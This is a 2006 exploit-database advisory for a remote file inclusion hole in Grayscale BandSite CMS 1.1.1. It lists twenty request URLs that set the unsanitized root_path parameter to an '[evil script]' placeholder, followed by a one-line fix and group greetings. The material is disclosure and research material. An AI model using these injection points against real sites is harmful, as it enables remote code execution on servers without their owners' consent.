BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion



EKU-ID: 9952 CVE: OSVDB-27252;CVE-2006-3193;OSVDB-27251;OSVDB-27250;OSVDB-27249;OSVDB-27248;OSVDB-27247;OSVDB-27246;OSVDB-27245;OSVDB-27244;OSVDB-27243;OSVDB-27242;OSVDB-27241;OSVDB-27240;OSVDB-27239;OSVDB-27238;OSVDB-27237;OSVDB-27236;OSVDB-27235;OSVDB-27234;OSVDB-27233 OSVDB-ID:
Author: Kw3[R]Ln Published: 2006-06-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


---------------------------------------------------------------------------
Grayscale BandSite CMS <=([root_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Grayscale BandSite CMS
version : latest version
URL :http://sourceforge.net/projects/bandsitecms/

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $root_path not sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~

declare variabel $root_path
---------------------------------------------------------------------------

Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-20]